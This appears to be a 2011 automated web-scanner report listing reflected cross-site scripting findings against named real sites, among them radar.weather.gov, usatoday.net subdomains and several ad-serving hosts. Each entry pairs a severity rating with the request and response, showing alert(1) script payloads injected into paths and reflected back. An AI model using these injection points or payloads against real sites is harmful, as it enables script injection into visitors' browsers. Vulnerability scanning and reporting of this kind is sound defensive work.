GET /rjss/bs.serving-sys.com Host: fw.adsafeprotected.com Proxy-Connection: keep-alive Referer: http://www.npr.org User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 Set-Cookie: JSESSIONID=44720CDF4 Content-Type: text/javascript Content-Length: 8046 Date: Mon, 09 May 2011 15:39:52 GMT Connection: close var adsafeVisParams = { mode : "jss", jsref : "http://www.npr.org adsafeSrc : "http://fw.adsafepro adsafeSep : "&", requrl : "", reqquery : "", debug : "false" }; (function(){var f="3.6";var o=(adsafeVisParams.debug= ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://fw.adsafeprotected |
Path: | /rjss/bs.serving-sys.com |
GET /rjss/bs.serving-sys.com Host: fw.adsafeprotected.com Proxy-Connection: keep-alive Referer: http://www.npr.org User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 Set-Cookie: JSESSIONID=CD7729D9C Content-Type: text/javascript Content-Length: 8043 Date: Mon, 09 May 2011 15:39:52 GMT Connection: close var adsafeVisParams = { mode : "jss", jsref : "http://www.npr.org adsafeSrc : "http://fw.adsafepro adsafeSep : "&", requrl : "", reqquery : "", debug : "false" }; (function(){var f="3.6";var o=(adsafeVisParams.debug= ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://fw.adsafeprotected |
Path: | /rjss/bs.serving-sys.com |
GET /rjss/bs.serving-sys.com Host: fw.adsafeprotected.com Proxy-Connection: keep-alive Referer: http://www.npr.org User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 Set-Cookie: JSESSIONID=091B05561 Content-Type: text/javascript Content-Length: 8043 Date: Mon, 09 May 2011 15:39:52 GMT Connection: close var adsafeVisParams = { mode : "jss", jsref : "http://www.npr.org adsafeSrc : "http://fw.adsafepro adsafeSep : "&", requrl : "", reqquery : " ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://fw.adsafeprotected |
Path: | /rjss/bs.serving-sys.com |
GET /rjss/bs.serving-sys.com Host: fw.adsafeprotected.com Proxy-Connection: keep-alive Referer: http://www.npr.org User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 Set-Cookie: JSESSIONID=EE59EBF0B Content-Type: text/javascript Content-Length: 8043 Date: Mon, 09 May 2011 15:39:51 GMT Connection: close var adsafeVisParams = { mode : "jss", jsref : "http://www.npr.org adsafeSrc : "http://fw.adsafepro adsafeSep : ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://fw.adsafeprotected |
Path: | /rjss/bs.serving-sys.com |
GET /rjss/bs.serving-sys.com Host: fw.adsafeprotected.com Proxy-Connection: keep-alive Referer: http://www.npr.org User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 Set-Cookie: JSESSIONID=4ED83BE5A Content-Type: text/javascript Content-Length: 8043 Date: Mon, 09 May 2011 15:39:51 GMT Connection: close var adsafeVisParams = { mode : "jss", jsref : "http://www.npr.org adsafeSrc : "http://fw.adsafepro adsafeSep : "&", requrl : ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://i.usatoday.net |
Path: | /asp/usatly/handler.ashx |
GET /asp/usatly/handler.ashx Host: i.usatoday.net Proxy-Connection: keep-alive Referer: http://www.usatoday.com Cache-Control: max-age=0 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 200 OK Content-Type: application/x-javascript; charset=utf-8 Server: Microsoft-IIS/7.5 X-AspNet-Version: 2.0.50727 P3P: CP="CAO CUR ADM DEVa TAIi PSAa PSDa CONi OUR OTRi IND PHY ONL UNI COM NAV DEM", POLICYREF="URI" Vary: Accept-Encoding Cache-Control: private, max-age=86400 Date: Mon, 09 May 2011 15:38:05 GMT Connection: close Content-Length: 140 var usatlyshorturl = 'e7f74';alert(1)/ |
Severity: | High |
Confidence: | Certain |
Host: | http://ib.adnxs.com |
Path: | /ab |
GET /ab?enc=AQAAAAAADEAA Host: ib.adnxs.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: icu=ChII-YMBEAoYASABKAEwy |
HTTP/1.1 200 OK Cache-Control: no-store, no-cache, private Pragma: no-cache Expires: Sat, 15 Nov 2008 16:00:00 GMT P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC" Set-Cookie: sess=1; path=/; expires=Tue, 10-May-2011 15:35:46 GMT; domain=.adnxs.com; HttpOnly Set-Cookie: uuid2=2724386019227846218 Content-Type: text/javascript Set-Cookie: uuid2=2724386019227846218 Set-Cookie: anj=Kfw)(CZ#0c)_Vsd7xrIB/ Date: Mon, 09 May 2011 15:35:46 GMT Content-Length: 1385 document.write('<scr' + 'ipt language=\"Javascript\">< ...[SNIP]... CFkSsYda6b2ziWrCchNA ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://ib.adnxs.com |
Path: | /ptj |
GET /ptj?member=311&inv_code Host: ib.adnxs.com Proxy-Connection: keep-alive Referer: http://optimized-by User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: icu=ChII-YMBEAoYASABKAEwy |
HTTP/1.1 200 OK Cache-Control: no-store, no-cache, private Pragma: no-cache Expires: Sat, 15 Nov 2008 16:00:00 GMT P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC" Set-Cookie: sess=1; path=/; expires=Tue, 10-May-2011 15:37:48 GMT; domain=.adnxs.com; HttpOnly Set-Cookie: uuid2=2724386019227846218 Set-Cookie: uuid2=2724386019227846218 Set-Cookie: icu=ChIIhboCEAoYASAB Set-Cookie: acb681375=5_[r^kI/7Zw[-! Set-Cookie: uuid2=2724386019227846218 Set-Cookie: anj=Kfw)(CZ#0c)_VtN.!fFc Content-Type: text/javascript Date: Mon, 09 May 2011 15:37:48 GMT Content-Length: 729 document.write('<scr'+ ...[SNIP]... 310802;contx=weath;an=40 ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://k.collective-media |
Path: | /cmadj/cm.rub_usatoday/ |
GET /cmadj/cm.rub_usatoday61f30'-alert(1)- Host: k.collective-media.net Proxy-Connection: keep-alive Referer: http://optimized-by User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: cli=11f8f328940989e; JY57=3c8l6OS0i837DN4 |
HTTP/1.1 200 OK Server: nginx/0.8.53 Content-Type: application/x-javascript P3P: policyref="http://a Vary: Accept-Encoding Date: Mon, 09 May 2011 15:37:07 GMT Connection: close Set-Cookie: mmpg=1; domain=collective-media Content-Length: 8102 function cmIV_(){var a=this;this.ts=null;this ...[SNIP]... <scr'+'ipt language="Javascript" ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://radar.weather.gov |
Path: | /Conus/images/favicon.ico |
GET /Conus/images/ad9d8"><script>alert(1)< Host: radar.weather.gov Proxy-Connection: keep-alive Accept: */* User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 404 Not Found Server: Apache Content-Type: text/html; charset=UTF-8 Content-Length: 14139 Vary: Accept-Encoding Date: Mon, 09 May 2011 15:36:47 GMT Connection: close <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <meta http-equiv="Content- ...[SNIP]... <input type="text" name="choices" size="30" value="http://radar ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://radar.weather.gov |
Path: | /Conus/images/favicon.ico |
GET /Conus/images/8d560<script>alert(1)< Host: radar.weather.gov Proxy-Connection: keep-alive Accept: */* User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 404 Not Found Server: Apache Content-Type: text/html; charset=UTF-8 Content-Length: 14127 Vary: Accept-Encoding Date: Mon, 09 May 2011 15:36:47 GMT Connection: close <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <meta http-equiv="Content- ...[SNIP]... <b>http://radar.weather ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://radar.weather.gov |
Path: | /Conus/index.php |
GET /Conus7a3aa<script>alert(1)< Host: radar.weather.gov Proxy-Connection: keep-alive Referer: http://www.srh.noaa.gov User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 404 Not Found Server: Apache Content-Type: text/html; charset=UTF-8 Content-Length: 14149 Vary: Accept-Encoding Date: Mon, 09 May 2011 15:36:47 GMT Connection: close <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <meta http-equiv="Content- ...[SNIP]... <b>http://radar.weather ...[SNIP]... |
Severity: | High |
Confidence: | Firm |
Host: | http://radar.weather.gov |
Path: | /Conus/index.php |
GET /Conus30135'><a>4523c2d38fe/index.php HTTP/1.1 Host: radar.weather.gov Proxy-Connection: keep-alive Referer: http://www.srh.noaa.gov User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 404 Not Found Server: Apache Content-Type: text/html; charset=UTF-8 Content-Length: 13944 Vary: Accept-Encoding Date: Mon, 09 May 2011 15:36:43 GMT Connection: close <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <meta http-equiv="Content- ...[SNIP]... <a href='http://radar ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://radar.weather.gov |
Path: | /Conus/index.php |
GET /Conuse9caa"><script>alert(1)< Host: radar.weather.gov Proxy-Connection: keep-alive Referer: http://www.srh.noaa.gov User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 404 Not Found Server: Apache Content-Type: text/html; charset=UTF-8 Content-Length: 14163 Vary: Accept-Encoding Date: Mon, 09 May 2011 15:36:42 GMT Connection: close <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <meta http-equiv="Content- ...[SNIP]... <input type="text" name="choices" size="30" value="http://radar ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://radar.weather.gov |
Path: | /Conus/index.php |
GET /Conus/998aa"><script>alert(1)< Host: radar.weather.gov Proxy-Connection: keep-alive Referer: http://www.srh.noaa.gov User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 404 Not Found Server: Apache Content-Type: text/html; charset=UTF-8 Content-Length: 14067 Vary: Accept-Encoding Date: Mon, 09 May 2011 15:36:48 GMT Connection: close <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <meta http-equiv="Content- ...[SNIP]... <input type="text" name="choices" size="30" value="http://radar ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://radar.weather.gov |
Path: | /images/favicon.ico |
GET /images/9220f"><script>alert(1)< Host: radar.weather.gov Proxy-Connection: keep-alive Accept: */* User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 404 Not Found Server: Apache Content-Type: text/html; charset=UTF-8 Content-Length: 15248 Vary: Accept-Encoding Date: Mon, 09 May 2011 15:38:03 GMT Connection: close <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <meta http-equiv="Content- ...[SNIP]... <input type="text" name="choices" size="30" value="http://radar ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://radar.weather.gov |
Path: | /images/favicon.ico |
GET /images/d22b5<script>alert(1)< Host: radar.weather.gov Proxy-Connection: keep-alive Accept: */* User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 404 Not Found Server: Apache Content-Type: text/html; charset=UTF-8 Content-Length: 15232 Vary: Accept-Encoding Date: Mon, 09 May 2011 15:38:04 GMT Connection: close <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <meta http-equiv="Content- ...[SNIP]... <b>http://radar.weather ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://radar.weather.gov |
Path: | /radar.php |
GET /6d24f"><script>alert(1)< Host: radar.weather.gov Proxy-Connection: keep-alive Referer: http://radar.weather.gov User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 404 Not Found Server: Apache Content-Type: text/html; charset=UTF-8 Content-Length: 14136 Vary: Accept-Encoding Date: Mon, 09 May 2011 15:38:03 GMT Connection: close <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <meta http-equiv="Content- ...[SNIP]... <input type="text" name="choices" size="30" value="http://radar ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://radar.weather.gov |
Path: | /radar.php |
GET /radar.php?rid=hdx Host: radar.weather.gov Proxy-Connection: keep-alive Referer: http://radar.weather.gov User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 200 OK Server: Apache Content-Type: text/html; charset=UTF-8 Vary: Accept-Encoding Cache-Control: max-age=300 Expires: Mon, 09 May 2011 15:43:02 GMT Date: Mon, 09 May 2011 15:38:02 GMT Connection: close Content-Length: 25375 <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR <title>NWS radar image from Holloman Air Force Base, NM</title> <meta name= ...[SNIP]... t.checkform1." + objs[i]); theObj.checked = true; } else { theObj = eval("document.checkform1 theObj.checked = false; } changeVisibility(theObj,i } theProduct = "N0R7E333";ALERT(1)/ var dt = "datetime"; getnewimg(theProduct,'HDX } function go(loop) { window.location.href = loop; } function newpage(radarid,product var cbox; var isloop = (loop==1 ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://sitelife.usatoday |
Path: | /ver1.0/sys/jsonp.app |
GET /ver1.0/sys/jsonp.app Host: sitelife.usatoday.com Proxy-Connection: keep-alive Referer: http://www.usatoday.com Cache-Control: max-age=0 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: s_lastvisit=1304954843536 |
HTTP/1.1 200 OK Set-Cookie: usatprod=R1449692072; path=/ Cache-Control: private Content-Type: application/javascript Vary: Content-Encoding Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 x-SiteLife-host: gnvm3l3pluckcom Set-Cookie: SiteLifeHost=gnvm3l3 Date: Mon, 09 May 2011 15:39:12 GMT Connection: close Content-Length: 94408 plcb0110ce<script>alert(1)< ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://sitelife.usatoday |
Path: | /ver1.0/sys/jsonp.app |
GET /ver1.0/sys/jsonp.app Host: sitelife.usatoday.com Proxy-Connection: keep-alive Referer: http://www.usatoday.com Cache-Control: max-age=0 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: s_lastvisit=1304954843536 |
HTTP/1.1 200 OK Set-Cookie: usatprod=R1449692072; path=/ Cache-Control: private Content-Type: application/javascript Vary: Content-Encoding Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 x-SiteLife-host: gnvm3l3pluckcom Set-Cookie: SiteLifeHost=gnvm3l3 Date: Mon, 09 May 2011 15:39:06 GMT Connection: close Content-Length: 34352 plcb0('\r\n\r\n<div class=\"pluck-app ...[SNIP]... <div id=\"pluck_comments_68630 ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://sitelife.usatoday |
Path: | /ver1.0/sys/jsonp.app |
GET /ver1.0/sys/jsonp.app Host: sitelife.usatoday.com Proxy-Connection: keep-alive Referer: http://www.usatoday.com Cache-Control: max-age=0 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: s_lastvisit=1304954843536 |
HTTP/1.1 200 OK Set-Cookie: usatprod=R1449692072; path=/ Cache-Control: private Content-Type: application/javascript Vary: Content-Encoding Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 x-SiteLife-host: gnvm3l3pluckcom Set-Cookie: SiteLifeHost=gnvm3l3 Date: Mon, 09 May 2011 15:38:58 GMT Connection: close Content-Length: 34697 plcb0('\r\n\r\n<div class=\"pluck-app ...[SNIP]... mments_94908\" class=\"pluck-app pluck-comm\" style=\"display:none;\" onpage=\"1\" itemsperpage=\"10\" sort=\"TimeStampAscending ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://w10.localadbuy.com |
Path: | /servlet/ajrotator/2735/0 |
GET /servlet288f6<script>alert(1)< Host: w10.localadbuy.com Proxy-Connection: keep-alive Referer: http://www.fox8live.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: optin=Aa; ajess1_ADC1D6F3755E8 |
HTTP/1.1 200 OK Server: JBird/1.0b Connection: close Date: Mon, 09 May 2011 15:37:02 GMT Content-Type: text/html <H1>404 Not Found</H1> <pre>Resource /servlet288f6<script>alert(1)< <BR> |
Severity: | High |
Confidence: | Certain |
Host: | http://w10.localadbuy.com |
Path: | /servlet/ajrotator/2735/0 |
GET /servlet/ajrotatordff80<script>alert(1)< Host: w10.localadbuy.com Proxy-Connection: keep-alive Referer: http://www.fox8live.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: optin=Aa; ajess1_ADC1D6F3755E8 |
HTTP/1.1 200 OK Server: JBird/1.0b Connection: close Date: Mon, 09 May 2011 15:37:02 GMT Content-Type: text/html <H1>404 Not Found</H1> <pre>Resource /servlet/ajrotatordff80<script>alert(1)< <BR> |
Severity: | High |
Confidence: | Certain |
Host: | http://w10.localadbuy.com |
Path: | /servlet/ajrotator/541/0 |
GET /servlet49990<script>alert(1)< Host: w10.localadbuy.com Proxy-Connection: keep-alive Referer: http://www.fox8live.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: optin=Aa; ajess1_ADC1D6F3755E8 |
HTTP/1.1 200 OK Server: JBird/1.0b Connection: close Date: Mon, 09 May 2011 15:37:18 GMT Content-Type: text/html <H1>404 Not Found</H1> <pre>Resource /servlet49990<script>alert(1)< <BR> |
Severity: | High |
Confidence: | Certain |
Host: | http://w10.localadbuy.com |
Path: | /servlet/ajrotator/541/0 |
GET /servlet/ajrotator204c1<script>alert(1)< Host: w10.localadbuy.com Proxy-Connection: keep-alive Referer: http://www.fox8live.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: optin=Aa; ajess1_ADC1D6F3755E8 |
HTTP/1.1 200 OK Server: JBird/1.0b Connection: close Date: Mon, 09 May 2011 15:37:18 GMT Content-Type: text/html <H1>404 Not Found</H1> <pre>Resource /servlet/ajrotator204c1<script>alert(1)< <BR> |
Severity: | High |
Confidence: | Certain |
Host: | http://w10.localadbuy.com |
Path: | /servlet/ajrotator/543/0 |
GET /servlet84d31<script>alert(1)< Host: w10.localadbuy.com Proxy-Connection: keep-alive Referer: http://www.fox8live.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: optin=Aa; ajess1_ADC1D6F3755E8 |
HTTP/1.1 200 OK Server: JBird/1.0b Connection: close Date: Mon, 09 May 2011 15:39:43 GMT Content-Type: text/html <H1>404 Not Found</H1> <pre>Resource /servlet84d31<script>alert(1)< <BR> |
Severity: | High |
Confidence: | Certain |
Host: | http://w10.localadbuy.com |
Path: | /servlet/ajrotator/543/0 |
GET /servlet/ajrotator49b08<script>alert(1)< Host: w10.localadbuy.com Proxy-Connection: keep-alive Referer: http://www.fox8live.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: optin=Aa; ajess1_ADC1D6F3755E8 |
HTTP/1.1 200 OK Server: JBird/1.0b Connection: close Date: Mon, 09 May 2011 15:39:44 GMT Content-Type: text/html <H1>404 Not Found</H1> <pre>Resource /servlet/ajrotator49b08<script>alert(1)< <BR> |
Severity: | High |
Confidence: | Certain |
Host: | http://w10.localadbuy.com |
Path: | /servlet/ajrotator/546/0 |
GET /servlet2d044<script>alert(1)< Host: w10.localadbuy.com Proxy-Connection: keep-alive Referer: http://www.fox8live.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: optin=Aa; ajess1_ADC1D6F3755E8 |
HTTP/1.1 200 OK Server: JBird/1.0b Connection: close Date: Mon, 09 May 2011 15:37:13 GMT Content-Type: text/html <H1>404 Not Found</H1> <pre>Resource /servlet2d044<script>alert(1)< <BR> |
Severity: | High |
Confidence: | Certain |
Host: | http://w10.localadbuy.com |
Path: | /servlet/ajrotator/546/0 |
GET /servlet/ajrotatorb9946<script>alert(1)< Host: w10.localadbuy.com Proxy-Connection: keep-alive Referer: http://www.fox8live.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: optin=Aa; ajess1_ADC1D6F3755E8 |
HTTP/1.1 200 OK Server: JBird/1.0b Connection: close Date: Mon, 09 May 2011 15:37:13 GMT Content-Type: text/html <H1>404 Not Found</H1> <pre>Resource /servlet/ajrotatorb9946<script>alert(1)< <BR> |
Severity: | High |
Confidence: | Certain |
Host: | http://w10.localadbuy.com |
Path: | /servlet/ajrotator/550/0 |
GET /servlet354e5<script>alert(1)< Host: w10.localadbuy.com Proxy-Connection: keep-alive Referer: http://www.fox8live.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: optin=Aa; ajess1_ADC1D6F3755E8 |
HTTP/1.1 200 OK Server: JBird/1.0b Connection: close Date: Mon, 09 May 2011 15:37:03 GMT Content-Type: text/html <H1>404 Not Found</H1> <pre>Resource /servlet354e5<script>alert(1)< <BR> |
Severity: | High |
Confidence: | Certain |
Host: | http://w10.localadbuy.com |
Path: | /servlet/ajrotator/550/0 |
